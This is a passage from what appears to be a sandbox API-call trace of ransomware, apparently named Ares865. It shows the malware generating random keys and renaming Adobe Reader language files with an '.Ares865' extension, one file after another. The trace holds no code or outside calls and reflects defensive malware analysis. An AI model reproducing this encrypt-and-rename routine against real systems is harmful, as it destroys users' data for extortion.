(normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.389] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28486) returned 1 [0160.389] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.390] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.390] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.394] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.394] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.395] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.pt_PT_PREEURO.txt" | out: lpString1="DisplayLanguageNames.pt_PT_PREEURO.txt") returned="DisplayLanguageNames.pt_PT_PREEURO.txt" [0160.395] lstrlenW (lpString="DisplayLanguageNames.pt_PT_PREEURO.txt") returned 38 [0160.395] lstrlenW (lpString="Ares865") returned 7 [0160.396] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0160.396] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT_PREEURO.txt.Ares865") returned 123 [0160.396] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt_preeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt_preeuro.txt.ares865"), dwFlags=0x1) returned 1 [0160.398] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt_preeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.398] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28496) returned 1 [0160.398] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.399] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.399] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.403] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.404] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.404] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.405] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ro.txt" | out: lpString1="DisplayLanguageNames.ro.txt") returned="DisplayLanguageNames.ro.txt" [0160.405] lstrlenW (lpString="DisplayLanguageNames.ro.txt") returned 27 [0160.405] lstrlenW (lpString="Ares865") returned 7 [0160.405] lstrcmpiW (lpString1=".ro.txt", lpString2="Ares865") returned -1 [0160.405] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro.txt.Ares865") returned 112 [0160.405] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro.txt.ares865"), dwFlags=0x1) returned 1 [0160.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.409] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27554) returned 1 [0160.409] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.411] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.411] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.415] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.416] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.416] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.417] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ro_RO.txt" | out: lpString1="DisplayLanguageNames.ro_RO.txt") returned="DisplayLanguageNames.ro_RO.txt" [0160.417] lstrlenW (lpString="DisplayLanguageNames.ro_RO.txt") returned 30 [0160.417] lstrlenW (lpString="Ares865") returned 7 [0160.417] lstrcmpiW (lpString1="_RO.txt", lpString2="Ares865") returned -1 [0160.417] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro_RO.txt.Ares865") returned 115 [0160.417] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro_RO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro_ro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro_RO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro_ro.txt.ares865"), dwFlags=0x1) returned 1 [0160.419] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro_RO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro_ro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.419] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27554) returned 1 [0160.419] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.420] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.420] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.425] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.426] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.426] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.427] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ru.txt" | out: lpString1="DisplayLanguageNames.ru.txt") returned="DisplayLanguageNames.ru.txt" [0160.427] lstrlenW (lpString="DisplayLanguageNames.ru.txt") returned 27 [0160.427] lstrlenW (lpString="Ares865") returned 7 [0160.427] lstrcmpiW (lpString1=".ru.txt", lpString2="Ares865") returned -1 [0160.427] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru.txt.Ares865") returned 112 [0160.427] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru.txt.ares865"), dwFlags=0x1) returned 1 [0160.429] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.429] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29848) returned 1 [0160.430] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.430] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.430] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.434] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.435] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.435] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.436] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ru_RU.txt" | out: lpString1="DisplayLanguageNames.ru_RU.txt") returned="DisplayLanguageNames.ru_RU.txt" [0160.436] lstrlenW (lpString="DisplayLanguageNames.ru_RU.txt") returned 30 [0160.436] lstrlenW (lpString="Ares865") returned 7 [0160.436] lstrcmpiW (lpString1="_RU.txt", lpString2="Ares865") returned -1 [0160.436] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_RU.txt.Ares865") returned 115 [0160.436] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_RU.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ru.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_RU.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ru.txt.ares865"), dwFlags=0x1) returned 1 [0160.440] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_RU.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ru.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.440] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29848) returned 1 [0160.440] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.441] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.441] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.446] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.447] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.447] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.448] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.ru_UA.txt" | out: lpString1="DisplayLanguageNames.ru_UA.txt") returned="DisplayLanguageNames.ru_UA.txt" [0160.448] lstrlenW (lpString="DisplayLanguageNames.ru_UA.txt") returned 30 [0160.448] lstrlenW (lpString="Ares865") returned 7 [0160.448] lstrcmpiW (lpString1="_UA.txt", lpString2="Ares865") returned -1 [0160.448] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_UA.txt.Ares865") returned 115 [0160.448] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_UA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ua.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_UA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ua.txt.ares865"), dwFlags=0x1) returned 1 [0160.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_UA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ua.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.450] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29718) returned 1 [0160.450] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.451] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.451] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.456] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.457] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.457] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.457] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.sk.txt" | out: lpString1="DisplayLanguageNames.sk.txt") returned="DisplayLanguageNames.sk.txt" [0160.458] lstrlenW (lpString="DisplayLanguageNames.sk.txt") returned 27 [0160.458] lstrlenW (lpString="Ares865") returned 7 [0160.458] lstrcmpiW (lpString1=".sk.txt", lpString2="Ares865") returned -1 [0160.458] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk.txt.Ares865") returned 112 [0160.458] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk.txt.ares865"), dwFlags=0x1) returned 1 [0160.460] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.460] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28022) returned 1 [0160.460] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.461] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.461] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.466] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.466] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.466] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.467] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.sk_SK.txt" | out: lpString1="DisplayLanguageNames.sk_SK.txt") returned="DisplayLanguageNames.sk_SK.txt" [0160.467] lstrlenW (lpString="DisplayLanguageNames.sk_SK.txt") returned 30 [0160.467] lstrlenW (lpString="Ares865") returned 7 [0160.467] lstrcmpiW (lpString1="_SK.txt", lpString2="Ares865") returned -1 [0160.468] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk_SK.txt.Ares865") returned 115 [0160.468] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk_SK.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk_sk.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk_SK.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk_sk.txt.ares865"), dwFlags=0x1) returned 1 [0160.473] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk_SK.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk_sk.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.473] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28022) returned 1 [0160.474] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.474] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.474] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.479] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.480] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.480] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.481] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.sl.txt" | out: lpString1="DisplayLanguageNames.sl.txt") returned="DisplayLanguageNames.sl.txt" [0160.481] lstrlenW (lpString="DisplayLanguageNames.sl.txt") returned 27 [0160.481] lstrlenW (lpString="Ares865") returned 7 [0160.481] lstrcmpiW (lpString1=".sl.txt", lpString2="Ares865") returned -1 [0160.481] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl.txt.Ares865") returned 112 [0160.481] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl.txt.ares865"), dwFlags=0x1) returned 1 [0160.483] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.483] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28400) returned 1 [0160.484] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.484] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.484] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.488] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.489] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.489] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.490] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.sl_SI.txt" | out: lpString1="DisplayLanguageNames.sl_SI.txt") returned="DisplayLanguageNames.sl_SI.txt" [0160.490] lstrlenW (lpString="DisplayLanguageNames.sl_SI.txt") returned 30 [0160.490] lstrlenW (lpString="Ares865") returned 7 [0160.490] lstrcmpiW (lpString1="_SI.txt", lpString2="Ares865") returned -1 [0160.490] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl_SI.txt.Ares865") returned 115 [0160.490] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl_SI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl_si.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl_SI.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl_si.txt.ares865"), dwFlags=0x1) returned 1 [0160.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl_SI.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl_si.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.492] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28400) returned 1 [0160.493] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.493] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.493] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.497] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.498] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.498] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.499] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.sv.txt" | out: lpString1="DisplayLanguageNames.sv.txt") 